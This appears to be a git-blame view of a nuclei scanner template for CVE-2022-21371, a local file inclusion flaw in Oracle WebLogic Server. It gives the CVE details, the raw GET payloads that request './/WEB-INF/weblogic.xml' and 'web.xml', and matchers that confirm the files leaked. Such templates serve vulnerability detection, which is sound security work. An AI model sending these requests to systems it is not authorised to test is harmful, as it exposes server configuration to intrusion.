nuclei-templates/http/cves/2022/CVE-2022-21371.yaml

54 lines
1.8 KiB
YAML
Raw Normal View History

2022-01-28 11:29:22 +00:00
id: CVE-2022-21371
info:
name: Oracle WebLogic Server Local File Inclusion
2022-01-28 11:29:22 +00:00
author: paradessia,narluin
severity: high
description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
2022-01-28 11:29:22 +00:00
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
2022-01-28 11:29:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
- http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
2022-01-28 11:29:22 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-01-28 11:29:22 +00:00
cve-id: CVE-2022-21371
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
epss-score: 0.9693
metadata:
max-request: 2
tags: cve,cve2022,lfi,weblogic,oracle,packetstorm
2022-01-28 11:29:22 +00:00
http:
2022-01-28 11:29:22 +00:00
- method: GET
raw:
- |+
GET {{path}} HTTP/1.1
Host: {{Hostname}}
2022-01-28 11:29:22 +00:00
payloads:
path:
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
unsafe: true
2022-01-28 11:29:22 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition: or
- type: dsl
dsl:
- 'contains(header, "text/xml")'
- 'contains(header, "application/xml")'
condition: or
2022-01-28 11:29:22 +00:00
- type: status
status:
- 200